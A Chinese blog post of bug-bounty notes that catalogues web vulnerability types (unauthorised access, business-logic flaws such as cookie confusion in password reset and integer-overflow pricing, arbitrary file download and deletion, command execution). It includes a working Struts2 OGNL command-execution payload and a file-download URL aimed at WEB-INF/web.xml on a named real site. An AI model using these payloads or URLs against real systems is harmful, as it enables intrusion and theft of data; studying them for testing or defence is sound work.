src漏洞类型总结

心已赠人 2022-12-31 03:24 145阅读 0赞

这三类存在漏洞可能更大

越他娘丑的站，越有可能存在洞。
    Asp aspx 存在漏洞的可能更大
    登陆口没得验证码的可能存在

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 1]

## 一,未授权访问 ##

[常见28种服务器或者中间协议未授权访问][28]  
易出现处  
①照片访问类代目录类处  
如乌云实例  
在http://learn.open.com.cn/登入  
首页-详细信息-查看 查看照片地址

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 2]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 3]

发现目录泄露了  
http://oemsresource.open.com.cn/Attachment/ExportTemp/OEMS/PictureTemp/20160711/  
② …/ 、 WEB-INF 、 jsp$（jsp结尾)类的文件读取类（典型过滤该类内容即可实现过滤类）  
如  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 4]

③审计元素代改包内容

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 5]

## 二,逻辑漏洞 ##

`二具二可`  
可多开,考虑多开逻辑。  
具多量,考虑空逻辑与覆盖逻辑或者替换逻辑  
具数字,考虑溢出逻辑  
可签到类–>可考虑并发逻辑

#业务逻辑漏洞
    常规思路
    ①值返回到页面中类型-->有点像泄露逻辑
    ②根据返回包判断可否的逻辑
    #骚思路逻辑
    ①并发逻辑-->启用一个直接并发同时打开好多个
    ②覆盖逻辑-->典型cookie覆盖逻辑
    ③校验逻辑-->典型未校验-->
    1.)如签约即可购买低价会员类逻辑,如果支付宝和微信均可,可以多开尝试是否校验校验解约后再次签约的情况
    2.)是否校验重复打开签约的情况(多开同开绕过)
    3.)空校验逻辑绕过
    
    ④溢出逻辑(因为溢出后会从零开始算导致)-->
    正数溢出-->即变量大于int类的数据导致如单价为2,要正数溢出-->可以1073741825个*2即大于2147483647
    负数溢出-->即典型负负得正的操作

[八种厂商的逻辑漏洞挖掘思路][Link 1]  
①cookie混淆–>两个同时进行找回密码  
（利用原理–>同一个浏览器中同时找回两个账户的密码，即一个浏览器找回不同密码时,两个账号的cookie相同导致的）  
（验证码与cookie绑定而两账号此时cookie相同造成了混淆,造成cookie混淆,进而实现越权更改密码）  
实际例子–>乌云1905后台重置密码处

注册个账号分析下数据包感觉闻到了cookie混淆的味道  
使用我的账号进行正常找回密码流程获取验证码，停留在输入验证码页面

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 6]  
这时在同一浏览器打开新的网页，用被害账号test进行正常找回流程停止输入手机验证码页面  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 7]  
然后在我的账号的新密码页面输入新密码  
提交后收到200返回包重置成功，test的密码被重置了！！  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 8]  
这里是因为验证码与cookie绑定而两账号此时cookie相同造成了混淆  
②cookie处返回了加密的验证码  
如  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 9]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 10]

③返回密码的邮箱在前端处  
如案例  
即改为自己的邮箱即可获取到相应的验证码  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 11]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 12]

## 三,任意文件下载 ##

典型以downloadFile文件结尾或者其他内容结尾的内容  
典型案列

#如中国证券协会
    http://person.sac.net.cn/pages/sacinfo/downloadFile.action?inputPath=WEB-INF%2Fweb.xml&fileName=studentFlow.pdf

## 四,任意文件删除 ##

原因：网站支持input delete等多余协议导致  
乌云案例  
即支持PUT DELETE协议导致后台任意文件删除  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 13]

## 五,命令执行漏洞 ##

①支持命令执行类  
如下  
支持shell命令  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 14]  
执行后即可输入命令的返回值状况  
②cve或者struts2漏洞执行等漏洞  
利用方式：  
利用漏洞利用工具直接执行即可

struts2漏洞典型手动利用代码

redirect:${ %23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 15]

典型cve  
1.)CVE-2014-0160  
[心脏滴血漏洞][Link 2]  
2.）反序列化漏洞  
原理：一个序列化的对象转换为字节的时候,代码审核不严格导致的命令执行漏洞  
[jboss反序列化教程][jboss]  
[java rmi反序列化漏洞][java rmi]–>典型1099端口

## 六.其余专题 ##

[文件泄露专题][Link 3]  
[xxe漏洞专题][xxe]  
[ssrf漏洞专题][ssrf]  
[任意文件读取专题][Link 4]  
[getshell专题][getshell]  
[iframe劫持专题][iframe]  
[URL重定向专题][URL]  
[xss专题][xss]  
[web特殊漏洞专题][web]  
[路径端口工具专题][Link 5]

## 表达式注入–>即由于表达式引起的命令执行漏洞 ##

典型：即框架接受参数后可执行命令导致  
[表达式注入][Link 6]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70]: /images/20221120/77180f69e3cb489f887db6e3ea0ba973.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 1]: /images/20221120/a40c50055fc74dd99b16fe7137ee4cd4.png
[28]: http://luckyzmj.cn/posts/15dff4d3.html
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 2]: /images/20221120/231cd6e418da4912a595d5a983f5b5e0.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 3]: /images/20221120/bb8c852db1d04bf1894ca83920d56e22.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 4]: /images/20221120/bc3681d1e3b144209f0b0efdf793dcff.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 5]: /images/20221120/33f36a9a15dc477585b5756419298417.png
[Link 1]: https://blog.csdn.net/qq_39997096/article/details/109683688?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control&dist_request_id=1328690.19826.16166356330800877&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 6]: /images/20221120/7969a39d1b8944f9b231bcb2790013f7.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 7]: /images/20221120/7c8896a83d8649c9a2c5d5c87b7856da.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 8]: /images/20221120/377880e0440347c888cc4ee2abe5db4d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 9]: /images/20221120/1f1051bad276409fbcca0416dd90282d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 10]: /images/20221120/d160b57e055a478da6c773b1ec528805.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 11]: /images/20221120/f5bde1e326dd4aa1b62edb0ab11f9490.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 12]: /images/20221120/cf373aa8ce31452d9a623e769b8b0028.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 13]: /images/20221120/112ec36f030e46aaaf726300b2b6c263.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 14]: /images/20221120/7f385e27459c42369aa047e0cac0b3d9.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 15]: /images/20221120/8d1bbcf9b9a14a5b83d78d74a7748b7f.png
[Link 2]: https://blog.csdn.net/weixin_43886632/article/details/88050773
[jboss]: https://www.freebuf.com/vuls/165060.html
[java rmi]: https://www.freebuf.com/column/200796.html
[Link 3]: https://blog.csdn.net/qq_33942040/article/details/110870939
[xxe]: https://blog.csdn.net/qq_33942040/article/details/111399819
[ssrf]: https://editor.csdn.net/md/?articleId=111054221
[Link 4]: https://blog.csdn.net/qq_33942040/article/details/110945755
[getshell]: https://blog.csdn.net/qq_33942040/article/details/112752642
[iframe]: https://blog.csdn.net/qq_33942040/article/details/109479897
[URL]: https://blog.csdn.net/qq_33942040/article/details/109478181
[xss]: https://blog.csdn.net/qq_33942040/article/details/108442427
[web]: https://blog.csdn.net/qq_33942040/article/details/112388721
[Link 5]: https://blog.csdn.net/qq_33942040/article/details/112908648
[Link 6]: https://misakikata.github.io/2018/09/%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/